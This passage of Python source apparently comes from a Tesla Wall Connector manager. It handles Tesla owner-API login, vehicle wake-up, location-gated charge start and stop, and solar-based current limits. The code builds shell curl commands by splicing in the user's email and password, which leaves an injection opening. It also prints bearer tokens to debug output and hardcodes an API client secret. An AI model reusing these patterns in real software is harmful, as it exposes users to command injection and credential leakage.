    # pop with a default mirrors the original's try/except KeyError.
    slaveTWCs.pop(deleteSlaveID, None)
def total_amps_actual_all_twcs():
    """Return the sum of amps every known slave TWC reports actually drawing."""
    global debugLevel, slaveTWCRoundRobin, wiringMaxAmpsAllTWCs
    totalAmps = sum(slaveTWC.reportedAmpsActual
                    for slaveTWC in slaveTWCRoundRobin)
    if(debugLevel >= 10):
        print("Total amps all slaves are using: " + str(totalAmps))
    return totalAmps
def car_api_available(email = None, password = None, charge = None):
    """Ensure the Tesla car API is usable: authenticate, list vehicles, wake them.

    Returns True when API commands may be issued. True does NOT mean any
    vehicle is actually awake and ready; it means there is no blocking error
    and we hold a bearer token plus a vehicle list. Returns False when a
    recent API error, missing/failed authentication, or an in-progress wake
    delay prevents API use.

    Parameters:
      email, password: optional credentials, used only when we have neither
        a bearer token nor a refresh token and must log in from scratch.
      charge: passed through by car_api_charge(); when True, vehicles
        flagged stopAskingToStartCharging are skipped.

    Fixes over the original:
      * needSleep is initialized up front; it used to be set only inside the
        len(carApiVehicles) > 0 branch, so the final 'if(needSleep)' raised
        NameError whenever we had a token but no vehicles.
      * The debugLevel >= 10 wake-delay message referenced a bare
        delayNextWakeAttempt (NameError) instead of the vehicle attribute.
    """
    global debugLevel, carApiLastErrorTime, carApiErrorRetryMins, \
           carApiTransientErrors, carApiBearerToken, carApiRefreshToken, \
           carApiTokenExpireTime, carApiVehicles

    now = time.time()
    apiResponseDict = {}
    # Must be defined before the tail of this function regardless of which
    # branches run (see fix note in the docstring).
    needSleep = False

    if(now - carApiLastErrorTime < carApiErrorRetryMins*60):
        # It's been under carApiErrorRetryMins minutes since the car API
        # generated an error. To keep strain off Tesla's API servers, wait
        # until the retry window passes. Reports (e.g.
        # https://teslamotorsclub.com/tmc/threads/model-s-rest-api.13410/page-114#post-2732052)
        # say hammering the servers gets a client blacklisted for ~30 mins,
        # so this back-off is deliberate.
        if(debugLevel >= 11):
            print(time_now() + ': Car API disabled for ' +
                  str(int(carApiErrorRetryMins*60 - (now - carApiLastErrorTime))) +
                  ' more seconds due to recent error.')
        return False

    # Tesla car API info comes from https://timdorr.docs.apiary.io/
    if(carApiBearerToken == '' or carApiTokenExpireTime - now < 30*24*60*60):
        cmd = None
        apiResponse = b''

        # If we don't have a bearer token or our refresh token will expire in
        # under 30 days, get a new bearer token. Refresh tokens expire in 45
        # days when first issued, so we'll get a new token every 15 days.
        if(carApiRefreshToken != ''):
            cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Content-Type: application/json" -d \'' + \
                  json.dumps({'grant_type': 'refresh_token', \
                              'client_id': '81527cff06843c8634fdc09e8ac0abefb46ac849f38fe1e431c2ef2106796384', \
                              'client_secret': 'c7257eb71a564034f9419ee651c7d0e5f7aa6bfbd18bafb5c5c033b093bb2fa3', \
                              'refresh_token': carApiRefreshToken }) + \
                  '\' "https://owner-api.teslamotors.com/oauth/token"'
        elif(email != None and password != None):
            cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Content-Type: application/json" -d \'' + \
                  json.dumps({'grant_type': 'password', \
                              'client_id': '81527cff06843c8634fdc09e8ac0abefb46ac849f38fe1e431c2ef2106796384', \
                              'client_secret': 'c7257eb71a564034f9419ee651c7d0e5f7aa6bfbd18bafb5c5c033b093bb2fa3', \
                              'email': email, 'password': password }) + \
                  '\' "https://owner-api.teslamotors.com/oauth/token"'

        if(cmd != None):
            if(debugLevel >= 2):
                # Hide car password in output
                cmdRedacted = re.sub(r'("password": )"[^"]+"', r'\1[HIDDEN]', cmd)
                print(time_now() + ': Car API cmd', cmdRedacted)
            apiResponse = run_process(cmd)
            # Example response:
            # b'{"access_token":"4720...","token_type":"bearer","expires_in":3888000,"refresh_token":"110d...","created_at":1525232970}'
            try:
                apiResponseDict = json.loads(apiResponse.decode('ascii'))
            except json.decoder.JSONDecodeError:
                pass

            try:
                if(debugLevel >= 4):
                    print(time_now() + ': Car API auth response', apiResponseDict, '\n')
                carApiBearerToken = apiResponseDict['access_token']
                carApiRefreshToken = apiResponseDict['refresh_token']
                carApiTokenExpireTime = now + apiResponseDict['expires_in']
            except KeyError:
                print(time_now() + ": ERROR: Can't access Tesla car via API. Please log in again via web interface.")
                carApiLastErrorTime = now
                # Instead of just setting carApiLastErrorTime, erase tokens to
                # prevent further authorization attempts until user enters password
                # on web interface. I feel this is safer than trying to log in every
                # ten minutes with a bad token because Tesla might decide to block
                # remote access to your car after too many authorization errors.
                carApiBearerToken = ''
                carApiRefreshToken = ''

            # Persist whichever outcome we got: fresh tokens on success,
            # cleared tokens on failure.
            save_settings()

    if(carApiBearerToken != ''):
        if(len(carApiVehicles) < 1):
            cmd = 'curl -s -m 60 -H "accept: application/json" -H "Authorization:Bearer ' + \
                  carApiBearerToken + \
                  '" "https://owner-api.teslamotors.com/api/1/vehicles"'
            if(debugLevel >= 8):
                print(time_now() + ': Car API cmd', cmd)
            try:
                apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
            except json.decoder.JSONDecodeError:
                pass

            try:
                if(debugLevel >= 4):
                    print(time_now() + ': Car API vehicle list', apiResponseDict, '\n')
                for i in range(0, apiResponseDict['count']):
                    carApiVehicles.append(CarApiVehicle(apiResponseDict['response'][i]['id']))
            except (KeyError, TypeError):
                # This catches cases like trying to access
                # apiResponseDict['response'] when 'response' doesn't exist in
                # apiResponseDict.
                print(time_now() + ": ERROR: Can't get list of vehicles via Tesla car API. Will try again in "
                      + str(carApiErrorRetryMins) + " minutes.")
                carApiLastErrorTime = now
                return False

        if(len(carApiVehicles) > 0):
            # Wake cars if needed
            for vehicle in carApiVehicles:
                if(charge == True and vehicle.stopAskingToStartCharging):
                    if(debugLevel >= 8):
                        print(time_now() + ": Don't charge vehicle " + str(vehicle.ID)
                              + " because vehicle.stopAskingToStartCharging == True")
                    continue

                if(now - vehicle.lastErrorTime < carApiErrorRetryMins*60):
                    # It's been under carApiErrorRetryMins minutes since the car
                    # API generated an error on this vehicle. Don't send it more
                    # commands yet.
                    if(debugLevel >= 8):
                        print(time_now() + ": Don't send commands to vehicle " + str(vehicle.ID)
                              + " because it returned an error in the last "
                              + str(carApiErrorRetryMins) + " minutes.")
                    continue

                if(vehicle.ready()):
                    continue

                if(now - vehicle.lastWakeAttemptTime <= vehicle.delayNextWakeAttempt):
                    if(debugLevel >= 10):
                        # Fix: original referenced bare delayNextWakeAttempt here.
                        print(time_now() + ": car_api_available returning False because we are still delaying "
                              + str(vehicle.delayNextWakeAttempt) + " seconds after the last failed wake attempt.")
                    return False

                # It's been delayNextWakeAttempt seconds since we last failed to
                # wake the car, or it's never been woken. Wake it.
                vehicle.lastWakeAttemptTime = now
                cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Authorization:Bearer ' + \
                      carApiBearerToken + \
                      '" "https://owner-api.teslamotors.com/api/1/vehicles/' + \
                      str(vehicle.ID) + '/wake_up"'
                if(debugLevel >= 8):
                    print(time_now() + ': Car API cmd', cmd)
                try:
                    apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
                except json.decoder.JSONDecodeError:
                    pass

                state = 'error'
                try:
                    if(debugLevel >= 4):
                        print(time_now() + ': Car API wake car response', apiResponseDict, '\n')
                    state = apiResponseDict['response']['state']
                except (KeyError, TypeError):
                    # This catches unexpected cases like trying to access
                    # apiResponseDict['response'] when 'response' doesn't exist
                    # in apiResponseDict.
                    state = 'error'

                if(state == 'online'):
                    # Car is awake. With max power saving the first wake_up
                    # almost always gets 'asleep' or 'offline' instead; an
                    # immediate 'online' is rare.
                    vehicle.firstWakeAttemptTime = 0
                    vehicle.delayNextWakeAttempt = 0
                    # Don't alter vehicle.lastWakeAttemptTime because
                    # vehicle.ready() uses it to return True if the last wake
                    # was under 2 mins ago.
                    needSleep = True
                else:
                    if(vehicle.firstWakeAttemptTime == 0):
                        vehicle.firstWakeAttemptTime = now

                    if(state == 'asleep' or state == 'waking'):
                        if(now - vehicle.firstWakeAttemptTime <= 10*60):
                            # An 'asleep' car is still receiving car API
                            # messages and starts waking after the first
                            # wake_up, but can take a minute or more to reach
                            # 'online'. Retry every 30 seconds for the first
                            # 10 minutes.
                            vehicle.delayNextWakeAttempt = 30
                        elif(now - vehicle.firstWakeAttemptTime <= 70*60):
                            # 'asleep' cars should wake within a couple of
                            # minutes, so we should never get here. If we do,
                            # try every 5 minutes for the next hour.
                            vehicle.delayNextWakeAttempt = 5*60
                        else:
                            # Car hasn't woken for an hour and 10 mins. Try
                            # again in 15 minutes. An error is reported later.
                            vehicle.delayNextWakeAttempt = 15*60
                    elif(state == 'offline'):
                        if(now - vehicle.firstWakeAttemptTime <= 31*60):
                            # An 'offline' car is presumably not wirelessly
                            # connected, so wake_up can't reach it. It wakes
                            # itself every 20-30 minutes and listens briefly;
                            # retrying every 25 seconds for 31 minutes has
                            # been observed to catch that window (~19.5 min
                            # in testing). 'offline' can also appear briefly
                            # after charging ends, or when the charger isn't
                            # plugged in.
                            vehicle.delayNextWakeAttempt = 25
                        # NOTE(review): after 31 minutes offline no new delay
                        # is assigned (matches the original); the previous
                        # delay simply remains in effect.
                    else:
                        # Handle 'error' state.
                        if(now - vehicle.firstWakeAttemptTime <= 60*60):
                            # We've tried to wake the car for less than an
                            # hour.
                            foundKnownError = False
                            if('error' in apiResponseDict):
                                error = apiResponseDict['error']
                                for knownError in carApiTransientErrors:
                                    if(knownError == error[0:len(knownError)]):
                                        foundKnownError = True
                                        break

                            if(foundKnownError):
                                # Known transient errors happen often enough
                                # that retrying in 1 minute beats the standard
                                # 5-minute error delay.
                                vehicle.delayNextWakeAttempt = 60
                            else:
                                # Unexpected state: API servers down, car out
                                # of range, etc. Try waking every 5 minutes.
                                vehicle.delayNextWakeAttempt = 5*60
                        else:
                            # Car hasn't woken for over an hour. Try again in
                            # 15 minutes. An error is reported later.
                            vehicle.delayNextWakeAttempt = 15*60

                    if(debugLevel >= 1):
                        if(state == 'error'):
                            print(time_now() + ": Car API wake car failed with unknown response. " \
                                  "Will try again in "
                                  + str(vehicle.delayNextWakeAttempt) + " seconds.")
                        else:
                            print(time_now() + ": Car API wake car failed. State remains: '"
                                  + state + "'. Will try again in "
                                  + str(vehicle.delayNextWakeAttempt) + " seconds.")

                    if(vehicle.firstWakeAttemptTime > 0
                       and now - vehicle.firstWakeAttemptTime > 60*60):
                        # It should never take over an hour to wake a car. If it
                        # does, ask user to report an error.
                        print(time_now() + ": ERROR: We have failed to wake a car from '"
                              + state + "' state for %.1f hours.\n" \
                              "Please private message user CDragon at " \
                              "http://teslamotorsclub.com with a copy of this error. " \
                              "Also include this: %s" % (
                              ((now - vehicle.firstWakeAttemptTime) / 60 / 60),
                              str(apiResponseDict)))

    if(now - carApiLastErrorTime < carApiErrorRetryMins*60 or carApiBearerToken == ''):
        if(debugLevel >= 8):
            print(time_now() + ": car_api_available returning False because of recent carApiLasterrorTime "
                  + str(now - carApiLastErrorTime) + " or empty carApiBearerToken '"
                  + carApiBearerToken + "'")
        return False

    if(debugLevel >= 8):
        # We return True to indicate there was no error that prevents running
        # car API commands and that we successfully got a list of vehicles.
        # True does not indicate that any vehicle is actually awake and ready
        # for commands.
        print(time_now() + ": car_api_available returning True")

    if(needSleep):
        # Commands sent within ~1 second of wake_up/update_location can fail
        # with {'result': False, 'reason': 'could_not_wake_buses'}; sleeping
        # 5 seconds after waking a car before sending a command is safest.
        time.sleep(5)

    return True
def car_api_charge(charge):
    """Tell every enrolled Tesla vehicle to start or stop charging.

    Do not call this function directly. Call by using background thread:
      queue_background_task({'cmd':'charge', 'charge':<True/False>})

    charge: True to start charging, False to stop charging.

    Returns 'success' when all applicable vehicles accepted the command, or
    'error' when rate-limited (under 60s since the last start/stop), when
    the car API is unavailable, or when any vehicle failed the command.

    Side effects: updates carApiLastStartOrStopChargeTime, may set
    homeLat/homeLon on first use, and may set per-vehicle error/charge
    flags.
    """
    global debugLevel, carApiLastErrorTime, carApiErrorRetryMins, \
           carApiTransientErrors, carApiVehicles, carApiLastStartOrStopChargeTime, \
           homeLat, homeLon, onlyChargeMultiCarsAtHome

    now = time.time()
    apiResponseDict = {}

    if(not charge):
        # Whenever we are going to tell vehicles to stop charging, set
        # vehicle.stopAskingToStartCharging = False on all vehicles.
        for vehicle in carApiVehicles:
            vehicle.stopAskingToStartCharging = False

    if(now - carApiLastStartOrStopChargeTime < 60):
        # Don't start or stop more often than once a minute
        if(debugLevel >= 8):
            print(time_now() + ': car_api_charge return because under 60 sec since last carApiLastStartOrStopChargeTime')
        return 'error'

    if(car_api_available(charge = charge) == False):
        if(debugLevel >= 8):
            print(time_now() + ': car_api_charge return because car_api_available() == False')
        return 'error'

    startOrStop = 'start' if charge else 'stop'
    result = 'success'

    for vehicle in carApiVehicles:
        if(charge and vehicle.stopAskingToStartCharging):
            if(debugLevel >= 8):
                print(time_now() + ": Don't charge vehicle " + str(vehicle.ID)
                      + " because vehicle.stopAskingToStartCharging == True")
            continue

        if(vehicle.ready() == False):
            continue

        # Only update carApiLastStartOrStopChargeTime if car_api_available() managed
        # to wake cars. Setting this prevents any command below from being sent
        # more than once per minute.
        carApiLastStartOrStopChargeTime = now

        if(onlyChargeMultiCarsAtHome and len(carApiVehicles) > 1):
            # When multiple cars are enrolled in the car API, only start/stop
            # charging cars parked at home.
            if(vehicle.update_location() == False):
                result = 'error'
                continue

            if(homeLat == 10000):
                if(debugLevel >= 1):
                    print(time_now() + ": Home location for vehicles has never been set. " +
                          "We'll assume home is where we found the first vehicle currently parked. " +
                          "Home set to lat=" + str(vehicle.lat) + ", lon=" +
                          str(vehicle.lon))
                homeLat = vehicle.lat
                homeLon = vehicle.lon
                save_settings()

            # 1 lat or lon = ~364488.888 feet. The exact feet is different depending
            # on the value of latitude, but this value should be close enough for
            # our rough needs.
            # 1/364488.888 * 10560 = 0.0289.
            # So if vehicle is within 0.0289 lat and lon of homeLat/Lon,
            # it's within ~10560 feet (2 miles) of home and we'll consider it to be
            # at home.
            # I originally tried using 0.00548 (~2000 feet) but one night the car
            # consistently reported being 2839 feet away from home despite being
            # parked in the exact spot I always park it. This is very odd because
            # GPS is supposed to be accurate to within 12 feet. Tesla phone app
            # also reports the car is not at its usual address. I suspect this
            # is another case of a bug that's been causing car GPS to freeze the
            # last couple months.
            if(abs(homeLat - vehicle.lat) > 0.0289
               or abs(homeLon - vehicle.lon) > 0.0289):
                # Vehicle is not at home, so don't change its charge state.
                if(debugLevel >= 1):
                    print(time_now() + ': Vehicle ID ' + str(vehicle.ID) +
                          ' is not at home. Do not ' + startOrStop + ' charge.')
                continue

            # If you send charge_start/stop less than 1 second after calling
            # update_location(), the charge command usually returns:
            #   {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
            # Waiting 2 seconds seems to consistently avoid the error, but let's
            # wait 5 seconds in case of hardware differences between cars.
            time.sleep(5)

        cmd = 'curl -s -m 60 -X POST -H "accept: application/json" -H "Authorization:Bearer ' + \
              carApiBearerToken + \
              '" "https://owner-api.teslamotors.com/api/1/vehicles/' + \
              str(vehicle.ID) + '/command/charge_' + startOrStop + '"'

        # Retry up to 3 times on certain errors.
        for retryCount in range(0, 3):
            if(debugLevel >= 8):
                print(time_now() + ': Car API cmd', cmd)
            try:
                apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
            except json.decoder.JSONDecodeError:
                pass

            try:
                if(debugLevel >= 4):
                    print(time_now() + ': Car API ' + startOrStop + \
                          ' charge response', apiResponseDict, '\n')
                # Responses I've seen in apiResponseDict:
                # Car is done charging:
                #   {'response': {'result': False, 'reason': 'complete'}}
                # Car wants to charge but may not actually be charging. Oddly, this
                # is the state reported when car is not plugged in to a charger!
                # It's also reported when plugged in but charger is not offering
                # power or even when the car is in an error state and refuses to
                # charge.
                #   {'response': {'result': False, 'reason': 'charging'}}
                # Car not reachable:
                #   {'response': None, 'error_description': '', 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}'}
                # This weird error seems to happen randomly and re-trying a few
                # seconds later often succeeds:
                #   {'response': {'result': False, 'reason': 'could_not_wake_buses'}}
                # I've seen this a few times on wake_up, charge_start, and drive_state:
                #   {'error': 'upstream internal error', 'response': None, 'error_description': ''}
                # I've seen this once on wake_up:
                #   {'error': 'operation_timedout for txid `4853e3ad74de12733f8cc957c9f60040`}', 'response': None, 'error_description': ''}
                # Start or stop charging success:
                #   {'response': {'result': True, 'reason': ''}}
                if(apiResponseDict['response'] == None):
                    if('error' in apiResponseDict):
                        foundKnownError = False
                        error = apiResponseDict['error']
                        for knownError in carApiTransientErrors:
                            if(knownError == error[0:len(knownError)]):
                                # I see these errors often enough that I think
                                # it's worth re-trying in 1 minute rather than
                                # waiting carApiErrorRetryMins minutes for retry
                                # in the standard error handler.
                                # Bug fix: this message previously said 'start
                                # charging' even when we were stopping a charge.
                                if(debugLevel >= 1):
                                    print(time_now() + ": Car API returned '"
                                          + error
                                          + "' when trying to " + startOrStop + " charging. Try again in 1 minute.")
                                time.sleep(60)
                                foundKnownError = True
                                break
                        if(foundKnownError):
                            continue

                    # This generally indicates a significant error like 'vehicle
                    # unavailable', but it's not something I think the caller can do
                    # anything about, so return generic 'error'.
                    result = 'error'
                    # Don't send another command to this vehicle for
                    # carApiErrorRetryMins mins.
                    vehicle.lastErrorTime = now
                elif(apiResponseDict['response']['result'] == False):
                    if(charge):
                        reason = apiResponseDict['response']['reason']
                        if(reason == 'complete' or reason == 'charging'):
                            # We asked the car to charge, but it responded that
                            # it can't, either because it's reached target
                            # charge state (reason == 'complete'), or it's
                            # already trying to charge (reason == 'charging').
                            # In these cases, it won't help to keep asking it to
                            # charge, so set vehicle.stopAskingToStartCharging =
                            # True.
                            #
                            # Remember, this only means at least one car in the
                            # list wants us to stop asking and we don't know
                            # which car in the list is connected to our TWC.
                            if(debugLevel >= 1):
                                print(time_now() + ': Vehicle ' + str(vehicle.ID)
                                      + ' is done charging or already trying to charge. Stop asking to start charging.')
                            vehicle.stopAskingToStartCharging = True
                        else:
                            # Car was unable to charge for some other reason, such
                            # as 'could_not_wake_buses'.
                            if(reason == 'could_not_wake_buses'):
                                # This error often happens if you call
                                # charge_start too quickly after another command
                                # like drive_state. Even if you delay 5 seconds
                                # between the commands, this error still comes
                                # up occasionally. Retrying often succeeds, so
                                # wait 5 secs and retry.
                                # If all retries fail, we'll try again in a
                                # minute because we set
                                # carApiLastStartOrStopChargeTime = now earlier.
                                time.sleep(5)
                                continue
                            else:
                                # Start or stop charge failed with an error I
                                # haven't seen before, so wait
                                # carApiErrorRetryMins mins before trying again.
                                print(time_now() + ': ERROR "' + reason + '" when trying to ' +
                                      startOrStop + ' car charging via Tesla car API. Will try again later.' +
                                      "\nIf this error persists, please private message user CDragon at http://teslamotorsclub.com " \
                                      "with a copy of this error.")
                                result = 'error'
                                vehicle.lastErrorTime = now
            except (KeyError, TypeError):
                # This catches cases like trying to access
                # apiResponseDict['response'] when 'response' doesn't exist in
                # apiResponseDict.
                print(time_now() + ': ERROR: Failed to ' + startOrStop
                      + ' car charging via Tesla car API. Will try again later.')
                vehicle.lastErrorTime = now
            break

    if(debugLevel >= 1 and carApiLastStartOrStopChargeTime == now):
        print(time_now() + ': Car API ' + startOrStop + ' charge result: ' + result)

    return result
def queue_background_task(task):
    """Hand *task* to background_tasks_thread unless one with the same cmd is pending."""
    global backgroundTasksQueue, backgroundTasksCmds

    cmd = task['cmd']

    # Some tasks, like cmd='charge', are requested once per second until a
    # charge starts or we determine the car is done charging. To avoid
    # wasting memory queuing a pile of identical tasks while one is still
    # being handled, refuse to queue a second task with the same cmd.
    if cmd in backgroundTasksCmds:
        return

    # Record cmd as in-flight; background_tasks_thread deletes this entry
    # when the task finishes, which re-enables queuing of that cmd.
    backgroundTasksCmds[cmd] = True

    # Hand the task to background_tasks_thread for processing.
    backgroundTasksQueue.put(task)
def background_tasks_thread():
    """Worker loop: run tasks queued via queue_background_task(), forever."""
    global backgroundTasksQueue, backgroundTasksCmds, carApiLastErrorTime

    while True:
        # Blocks until a task is available.
        job = backgroundTasksQueue.get()
        cmd = job['cmd']

        if cmd == 'charge':
            # car_api_charge does nothing if it's been under 60 secs since it
            # was last used so we shouldn't have to worry about calling this
            # too frequently.
            car_api_charge(job['charge'])
        elif cmd == 'carApiEmailPassword':
            # Fresh credentials: clear the global error timestamp so the API
            # is retried immediately.
            carApiLastErrorTime = 0
            car_api_available(job['email'], job['password'])
        elif cmd == 'checkGreenEnergy':
            check_green_energy()

        # Remove cmd from backgroundTasksCmds so queue_background_task() can
        # queue another task with this cmd in the future.
        del backgroundTasksCmds[cmd]

        # task_done() must be called to let the queue know the task is
        # finished; backgroundTasksQueue.join() can then be used to block
        # until all tasks in the queue are done.
        backgroundTasksQueue.task_done()
def check_green_energy():
    """Poll solar generation and cap car charging to the surplus.

    Queries a The Energy Detective (TED) gateway for current generation,
    converts the reported kW into amps at 240V, adds greenEnergyAmpsOffset,
    and publishes the result in maxAmpsToDivideAmongSlaves (under
    backgroundTasksLock). Logs an error if the TED output can't be parsed.
    """
    global debugLevel, maxAmpsToDivideAmongSlaves, greenEnergyAmpsOffset, \
           minAmpsPerTWC, backgroundTasksLock

    # I check solar panel generation using an API exposed by The
    # Energy Detective (TED). It's a piece of hardware available
    # at http://www.theenergydetective.com
    # You may also be able to find a way to query a solar system
    # on the roof using an API provided by your solar installer.
    # Most of those systems only update the amount of power the
    # system is producing every 15 minutes at most, but that's
    # fine for tweaking your car charging.
    #
    # In the worst case, you could skip finding realtime green
    # energy data and simply direct the car to charge at certain
    # rates at certain times of day that typically have certain
    # levels of solar or wind generation. To do so, use the hour
    # and min variables as demonstrated just above this line:
    #   backgroundTasksQueue.put({'cmd':'checkGreenEnergy'})
    #
    # The curl command used below can be used to communicate
    # with almost any web API, even ones that require POST
    # values or authentication. The -s option prevents curl from
    # displaying download stats. -m 60 prevents the whole
    # operation from taking over 60 seconds.
    greenEnergyData = run_process('curl -s -m 60 "http://192.168.13.58/history/export.csv?T=1&D=0&M=1&C=1"')

    # Typically, greenEnergyData will contain something like this:
    #   MTU, Time, Power, Cost, Voltage
    #   Solar,11/11/2017 14:20:43,-2.957,-0.29,124.3
    # The only part we care about is -2.957 which is negative
    # kW currently being generated. When 0kW is generated, the
    # negative disappears so we make it optional in the regex
    # below.
    m = re.search(b'^Solar,[^,]+,-?([^, ]+),', greenEnergyData, re.MULTILINE)
    if(m):
        solarW = int(float(m.group(1)) * 1000)

        # Use backgroundTasksLock to prevent changing maxAmpsToDivideAmongSlaves
        # if the main thread is in the middle of examining and later using
        # that value. A 'with' block guarantees the lock is released even if
        # the code inside raises; the previous acquire()/release() pair would
        # leave the lock held forever on an exception, deadlocking the main
        # thread.
        with backgroundTasksLock:
            # Watts = Volts * Amps
            # Car charges at 240 volts in North America so we figure
            # out how many amps * 240 = solarW and limit the car to
            # that many amps.
            maxAmpsToDivideAmongSlaves = (solarW / 240) + \
                                          greenEnergyAmpsOffset

            if(debugLevel >= 1):
                print("%s: Solar generating %dW so limit car charging to:\n" \
                      " %.2fA + %.2fA = %.2fA. Charge when above %.0fA (minAmpsPerTWC)." % \
                      (time_now(), solarW, (solarW / 240),
                       greenEnergyAmpsOffset, maxAmpsToDivideAmongSlaves,
                       minAmpsPerTWC))
    else:
        print(time_now() +
              " ERROR: Can't determine current solar generation from:\n" +
              str(greenEnergyData))
#
# End functions
#
##############################
##############################
#
# Begin CarApiVehicle class
#
class CarApiVehicle:
    """Per-vehicle state for the Tesla car (owner) API.

    The values below are class-level defaults; each instance shadows them
    with its own attribute the first time code assigns to it (e.g.
    self.lastErrorTime = ... in update_location).
    """
    # Tesla API vehicle ID, used to build per-vehicle API URLs (set in __init__).
    ID = None

    # time.time() stamps for the wake_up cycle managed by car_api_available.
    # NOTE(review): firstWakeAttemptTime == 0 appears to mean no wake cycle is
    # in progress / the last wake succeeded — confirm against car_api_available.
    firstWakeAttemptTime = 0
    lastWakeAttemptTime = 0
    # Seconds to wait before the next wake_up attempt.
    delayNextWakeAttempt = 0

    # time.time() of the most recent car API error for this vehicle; ready()
    # refuses commands for carApiErrorRetryMins minutes after an error.
    lastErrorTime = 0
    # True once the car reported 'complete' or 'charging', meaning there is
    # no point re-sending charge_start (see car_api_charge).
    stopAskingToStartCharging = False
    # 10000 is a sentinel for "location unknown" (valid latitudes/longitudes
    # are far smaller); update_location() fills in real values.
    lat = 10000
    lon = 10000

    def __init__(self, ID):
        self.ID = ID

    def ready(self):
        """Return True if this vehicle is believed awake and safe to command."""
        global carApiLastErrorTime, carApiErrorRetryMins

        if(time.time() - self.lastErrorTime < carApiErrorRetryMins*60):
            # It's been under carApiErrorRetryMins minutes since the car API
            # generated an error on this vehicle. Return that car is not ready.
            if(debugLevel >= 8):
                print(time_now() + ': Vehicle ' + str(self.ID)
                      + ' not ready because of recent lastErrorTime '
                      + str(self.lastErrorTime))
            return False

        if(self.firstWakeAttemptTime == 0 and time.time() - self.lastWakeAttemptTime < 2*60):
            # Less than 2 minutes since we successfully woke this car, so it
            # should still be awake. Tests on my car in energy saver mode show
            # it returns to sleep state about two minutes after the last command
            # was issued. Times I've tested: 1:35, 1:57, 2:30
            return True

        if(debugLevel >= 8):
            print(time_now() + ': Vehicle ' + str(self.ID)
                  + " not ready because it wasn't woken in the last 2 minutes.")
        return False

    def update_location(self):
        """Fetch this vehicle's GPS position into self.lat/self.lon.

        Calls the drive_state API endpoint, retrying up to 3 times on known
        transient errors. Returns True on success; returns False (and sets
        self.lastErrorTime) if the vehicle isn't ready or the call fails.
        """
        global carApiLastErrorTime, carApiTransientErrors

        if(self.ready() == False):
            return False

        apiResponseDict = {}

        cmd = 'curl -s -m 60 -H "accept: application/json" -H "Authorization:Bearer ' + \
              carApiBearerToken + \
              '" "https://owner-api.teslamotors.com/api/1/vehicles/' + \
              str(self.ID) + '/data_request/drive_state"'

        # Retry up to 3 times on certain errors.
        for retryCount in range(0, 3):
            if(debugLevel >= 8):
                print(time_now() + ': Car API cmd', cmd)
            try:
                apiResponseDict = json.loads(run_process(cmd).decode('ascii'))
                # This error can happen here as well:
                #   {'response': {'reason': 'could_not_wake_buses', 'result': False}}
                # This one is somewhat common:
                #   {'response': None, 'error': 'vehicle unavailable: {:error=>"vehicle unavailable:"}', 'error_description': ''}
            except json.decoder.JSONDecodeError:
                # Leave apiResponseDict as-is; the code below treats missing
                # keys as an error via the KeyError/TypeError handler.
                pass

            try:
                if(debugLevel >= 4):
                    print(time_now() + ': Car API vehicle GPS location', apiResponseDict, '\n')

                if('error' in apiResponseDict):
                    foundKnownError = False
                    error = apiResponseDict['error']
                    for knownError in carApiTransientErrors:
                        if(knownError == error[0:len(knownError)]):
                            # I see these errors often enough that I think
                            # it's worth re-trying in 1 minute rather than
                            # waiting carApiErrorRetryMins minutes for retry
                            # in the standard error handler.
                            if(debugLevel >= 1):
                                print(time_now() + ": Car API returned '"
                                      + error
                                      + "' when trying to get GPS location. Try again in 1 minute.")
                            time.sleep(60)
                            foundKnownError = True
                            break
                    if(foundKnownError):
                        continue

                response = apiResponseDict['response']

                # A successful call to drive_state will not contain a
                # response['reason'], so we check if the 'reason' key exists.
                if('reason' in response and response['reason'] == 'could_not_wake_buses'):
                    # Retry after 5 seconds. See notes in car_api_charge where
                    # 'could_not_wake_buses' is handled.
                    time.sleep(5)
                    continue

                self.lat = response['latitude']
                self.lon = response['longitude']
            except (KeyError, TypeError):
                # This catches cases like trying to access
                # apiResponseDict['response'] when 'response' doesn't exist in
                # apiResponseDict.
                if(debugLevel >= 1):
                    print(time_now() + ": ERROR: Can't get GPS location of vehicle " + str(self.ID) + \
                          ". Will try again later.")
                self.lastErrorTime = time.time()
                return False

            return True
#
# End CarApiVehicle class
#
##############################
##############################
#
# Begin TWCSlave class
#
class TWCSlave:
    """One real slave TWC that our fake master exchanges heartbeats with.

    The values below are class-level defaults; instances shadow them as
    heartbeat data arrives and as amps are offered.
    """
    # Two-byte RS485 ID of this slave TWC (set in __init__).
    TWCID = None
    # Max amps this TWC reports supporting (set in __init__).
    maxAmps = None

    # Protocol 2 TWCs tend to respond to commands sent using protocol 1, so
    # default to that till we know for sure we're talking to protocol 2.
    protocolVersion = 1
    minAmpsTWCSupports = 6
    masterHeartbeatData = bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00')
    # NOTE(review): evaluated once at class-definition time; refreshed
    # per-instance when a heartbeat is received — confirm every instance gets
    # a heartbeat before timeLastRx is compared against.
    timeLastRx = time.time()

    # reported* vars below are reported to us in heartbeat messages from a Slave
    # TWC.
    reportedAmpsMax = 0
    reportedAmpsActual = 0
    reportedState = 0

    # reportedAmpsActual frequently changes by small amounts, like 5.14A may
    # frequently change to 5.23A and back.
    # reportedAmpsActualSignificantChangeMonitor is set to reportedAmpsActual
    # whenever reportedAmpsActual is at least 0.8A different than
    # reportedAmpsActualSignificantChangeMonitor. Whenever
    # reportedAmpsActualSignificantChangeMonitor is changed,
    # timeReportedAmpsActualChangedSignificantly is set to the time of the
    # change. The value of reportedAmpsActualSignificantChangeMonitor should not
    # be used for any other purpose. timeReportedAmpsActualChangedSignificantly
    # is used for things like preventing start and stop charge on a car more
    # than once per minute.
    reportedAmpsActualSignificantChangeMonitor = -1
    timeReportedAmpsActualChangedSignificantly = time.time()

    # -1 means "not yet initialized"; replaced with the TWC's reported max on
    # the first heartbeat received.
    lastAmpsOffered = -1
    timeLastAmpsOfferedChanged = time.time()
    # Cache of the last debug line printed, used to suppress near-duplicate
    # once-per-second heartbeat output (see print_status).
    lastHeartbeatDebugOutput = ''
    timeLastHeartbeatDebugOutput = 0
    # Amps the wiring feeding this TWC can handle (module-level config value).
    wiringMaxAmps = wiringMaxAmpsPerTWC

    def __init__(self, TWCID, maxAmps):
